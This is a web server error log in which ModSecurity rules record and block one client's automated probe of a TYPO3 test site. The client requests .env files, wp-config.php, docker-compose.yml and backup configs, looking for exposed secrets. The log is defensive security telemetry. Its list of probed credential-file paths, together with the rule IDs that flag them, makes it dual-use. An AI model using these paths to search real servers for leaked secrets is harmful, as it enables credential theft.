[Sun Aug 10 18:02:04.329721 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdDgAAAAI"]
[Sun Aug 10 18:02:04.330008 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdDgAAAAI"]
[Sun Aug 10 18:02:04.330222 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdDgAAAAI"]
[Sun Aug 10 18:02:04.388589 2025] [authz_core:error] [pid 1839636] [client 185.177.72.56:4414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Sun Aug 10 18:02:04.409545 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdEQAAAAI"]
[Sun Aug 10 18:02:04.409790 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdEQAAAAI"]
[Sun Aug 10 18:02:04.409980 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdEQAAAAI"]
[Sun Aug 10 18:02:04.430745 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJjCfCTM1z0kwYTEsGjdEgAAAAI"]
[Sun Aug 10 18:02:04.430988 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJjCfCTM1z0kwYTEsGjdEgAAAAI"]
[Sun Aug 10 18:02:04.431181 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJjCfCTM1z0kwYTEsGjdEgAAAAI"]
[Sun Aug 10 18:02:04.451663 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdEwAAAAI"]
[Sun Aug 10 18:02:04.451937 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdEwAAAAI"]
[Sun Aug 10 18:02:04.452130 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdEwAAAAI"]
[Sun Aug 10 18:02:04.547882 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJjCfCTM1z0kwYTEsGjdFgAAAAI"]
[Sun Aug 10 18:02:04.548192 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJjCfCTM1z0kwYTEsGjdFgAAAAI"]
[Sun Aug 10 18:02:04.548407 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJjCfCTM1z0kwYTEsGjdFgAAAAI"]
[Sun Aug 10 18:02:04.680399 2025] [authz_core:error] [pid 1839636] [client 185.177.72.56:4414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Sun Aug 10 18:02:04.738618 2025] [authz_core:error] [pid 1839636] [client 185.177.72.56:4414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app.yaml
[Sun Aug 10 18:02:04.835595 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdHwAAAAI"]
[Sun Aug 10 18:02:04.835893 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdHwAAAAI"]
[Sun Aug 10 18:02:04.836097 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdHwAAAAI"]
[Sun Aug 10 18:02:04.857002 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "aJjCfCTM1z0kwYTEsGjdIAAAAAI"]
[Sun Aug 10 18:02:04.857244 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "aJjCfCTM1z0kwYTEsGjdIAAAAAI"]
[Sun Aug 10 18:02:04.857662 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "aJjCfCTM1z0kwYTEsGjdIAAAAAI"]
[Sun Aug 10 18:02:04.946167 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdIgAAAAI"]
[Sun Aug 10 18:02:04.946441 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdIgAAAAI"]
[Sun Aug 10 18:02:04.946639 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdIgAAAAI"]
[Sun Aug 10 18:02:04.967413 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdIwAAAAI"]
[Sun Aug 10 18:02:04.967672 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdIwAAAAI"]
[Sun Aug 10 18:02:04.967851 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdIwAAAAI"]
[Sun Aug 10 18:02:04.988402 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdJAAAAAI"]
[Sun Aug 10 18:02:04.988649 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdJAAAAAI"]
[Sun Aug 10 18:02:04.988890 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aJjCfCTM1z0kwYTEsGjdJAAAAAI"]
[Sun Aug 10 18:02:05.122199 2025] [authz_core:error] [pid 1839636] [client 185.177.72.56:4414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Sun Aug 10 18:02:05.143130 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/src/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdKQAAAAI"]
[Sun Aug 10 18:02:05.143427 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/src/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdKQAAAAI"]
[Sun Aug 10 18:02:05.143611 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/src/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdKQAAAAI"]
[Sun Aug 10 18:02:05.201927 2025] [authz_core:error] [pid 1839636] [client 185.177.72.56:4414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configuration.php.bak
[Sun Aug 10 18:02:05.262120 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJjCfSTM1z0kwYTEsGjdLQAAAAI"]
[Sun Aug 10 18:02:05.262387 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJjCfSTM1z0kwYTEsGjdLQAAAAI"]
[Sun Aug 10 18:02:05.262584 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJjCfSTM1z0kwYTEsGjdLQAAAAI"]
[Sun Aug 10 18:02:05.283244 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /platform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/platform/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdLgAAAAI"]
[Sun Aug 10 18:02:05.283509 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/platform/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdLgAAAAI"]
[Sun Aug 10 18:02:05.283708 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/platform/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdLgAAAAI"]
